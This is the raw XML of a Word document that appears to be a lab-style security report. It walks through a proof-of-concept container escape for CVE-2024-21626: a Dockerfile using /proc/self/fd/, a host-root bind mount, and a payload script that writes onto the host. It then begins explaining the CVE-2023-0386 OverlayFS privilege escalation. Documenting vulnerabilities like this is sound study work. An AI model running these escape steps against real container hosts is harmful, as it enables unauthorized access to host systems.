    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000171">
      <w:pPr>
        <w:spacing w:after="0"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2"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">             cd m1-image</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000172">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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Step 2: Create Dockerfile:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000173">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nano Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000174">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(contents of dockerfile)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000175">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FROM ubuntu:latest </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000176">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RUN mkdir -p /host-root </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000177">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WORKDIR /proc/self/fd/ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000178">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CMD [“sh”, “-c”, “while true; do sleep 1; done”]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000179">
      <w:pP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7A">
      <w:pPr>
        <w:spacing w:after="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Step 3: Build the Malicious Docker Image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017B">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docker build -t p1-image .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017C">
      <w:pP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7D">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b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Run the Container</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">             docker run -d --name p1-container --mount type=bind,source=/,target=/host-root p1-image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017E">
      <w:pP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7F">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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Step 5: Create payload.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000180">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nano payload.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000181">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(contents of payload.sh)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000182">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#!/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000183">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echo “Running payload script”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000184">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echo 'malicious content' &gt; /host-root/tmp/exploit-dir/exploit-file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000185">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echo “payload script completed”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000186">
      <w:pP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87">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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Step 6: Copy and Execute the Payload Script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000188">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docker cp payload.sh p1-container:/tmp/ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000189">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docker exec -it p1-container sh -c "chmod +x /tmp/payload.sh &amp;&amp; /tmp/payload.sh"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018A">
      <w:pP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8B">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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Step 7: Verify the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018C">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cat /tmp/exploit-dir/exploit-file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018D">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018E">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018F">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000190">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000191">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000192">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000193">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000194">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000195">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000196">
      <w:pPr>
        <w:spacing w:after="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POC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000197">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3581400"/>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after="0" w:line="276"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 Overwriting semi-arbitrary host binaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000199">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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9A">
      <w:pPr>
        <w:spacing w:after="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References:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">NVD - CVE-2024-21626 (nist.gov)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CVE-2024-21626/README.md at main · NitroCao/CVE-2024-21626 · GitHub</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019D">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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9E">
      <w:pP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9F">
      <w:pP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A0">
      <w:pP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A1">
      <w:pP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A2">
      <w:pP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A3">
      <w:pP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A4">
      <w:pP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A5">
      <w:pP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A6">
      <w:pP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A7">
      <w:pP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A8">
      <w:pP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A9">
      <w:pP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AA">
      <w:pP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AB">
      <w:pP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AC">
      <w:pP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AD">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white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3: POC: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AE">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CVE Id: 2023-0386</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AF">
      <w:pPr>
        <w:spacing w:after="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spacing w:after="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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability: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A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B1">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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Key Concepts and Functionality of OverlayFS:</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1B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Operation:</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1B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="180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OverlayFS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> combines two file systems, referred to as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lower</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upper</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> layers, into a unified file system view. The lower layer is read-only, while the upper layer is writable. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="180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When a file is accessed, OverlayFS first checks the upper layer. If the file or directory is present there, it is used. If not, OverlayFS looks into the lower layer. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Components:</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1B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="180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Lower Layer:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The read-only part of the file system, which could be a base image or system directory. This layer cannot be modified directly. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="180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Upper Layer:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The writable part of the file system where changes are made. This is where new files are created, and existing files are modified. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="180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Work Directory:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This directory is used by OverlayFS to perform its operations and manage changes before they are committed to the upper layer. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Functionality:</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1BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="180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Union Mounting:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OverlayFS creates a union view of the lower and upper layers, presenting them as a single file system to users and applications. </w:t>
      </w:r>
    </w:p>
